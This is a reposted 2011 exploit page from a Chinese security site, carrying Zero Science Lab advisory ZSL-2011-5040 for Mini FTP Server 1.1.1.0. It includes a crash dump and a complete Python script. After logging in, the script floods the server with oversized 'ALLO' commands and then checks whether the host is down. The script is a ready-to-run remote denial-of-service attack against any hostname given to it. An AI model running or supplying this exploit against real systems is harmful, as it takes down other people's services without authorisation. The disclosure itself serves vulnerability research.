首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2011-08-29  

#!/usr/bin/python
#
#
# Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit
#
#
# Vendor: webmaster442
# Product web page: http://miniftpserver.codeplex.com
# Affected version: 1.1.1.0
#
# Summary: Minimal FTP server for windows. Uses only managed code. Works
# with Total commander.
#
# Desc: MiniFTPServer suffers from a denial of service vulnerability
# when passing large number of bytes after authentication, resulting
# in a crash. No need for a valid FTP command to exploit this issue.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# -----------------------------------------------------------------
#
# (1540.918): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
# eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 031187d3 3909            cmp     dword ptr [ecx],ecx  ds:0023:00000000=????????
# 0:011> d edx
# 00f163e8  80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00  .j.z(.......d...
# 00f163f8  54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80  Tr..............
# 00f16408  00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00  ....Ld..........
# 00f16418  18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
# 00f16428  b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
# 00f16438  00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00  ............P...
# 00f16448  00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00  ....h..y....pd..
# 00f16458  00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00  .............r..
# 0:011> d
# 00f16468  00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00  ..........\{....
# 00f16478  80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79  .....d......`..y
# 00f16488  c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79  ...............y
# 00f16498  f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
# 00f164a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#
# -----------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2011-5040
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php
#
#
# 28.08.2011
#

import socket, sys
 
if len(sys.argv) < 2:
 print ("\n===============================================")
 print ("\nMini FTP Server 1.1 Remote DoS Exploit\n")
 print ("Zero Science Lab - http://www.zeroscience.mk")
 print ("\nID: ZSL-2011-5040")
 print ("\n===============================================")
 print ("\n - Usage: "+ sys.argv[0] +" [hostname]\n")
 sys.exit(0)

host = (sys.argv[1])
data = ("A@" * 50000) #Any char and combination would do
cmd = ('ALLO') #Any CMD would do, or no CMD at all
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[+] Attacking: " + host +"\r\n")
print ("[*] Please be patient...\r\n")

try:
 s.connect((host, 21))
 r=s.recv(1024)
 print (r)
 s.send("USER username\r\n")
 r=s.recv(1024)
 print (r)
 s.send("PASS password\r\n")
 r=s.recv(1024)
 print (r)
 s.send(cmd + " " + data + '\r\n')
 r=s.recv(1024)
 print (r)
 print ("[*] Please be patient...\r\n")
 for x in range(0,10): s.send(cmd + " " + data + '\r\n')
 r=s.recv(1024)
 print (r)
 s.close()

 try: s.connect((host,21))
 except: print ("\r\n[*] Host is down!")

except: print ("[*] Oops!")


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·yahoo! player 1.5 (.m3u) Unive
·Groovy Media Player Version 2.
·Free MP3 CD Ripper 1.1 DEP Byp
·Portable Saint Paint Studio Lo
·Free MP3 CD Ripper 1.1 Local B
·Mini-stream Ripper 2.9.7.273 (
·Sunway Force Control SCADA 6.1
·LifeSize Room Command Injectio
·RealVNC Authentication Bypass
·HTTPKiller - FHTTP Kit by Xian
·Apache httpd Remote Denial of
·Zortam Mp3 Center 3.50 memory
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved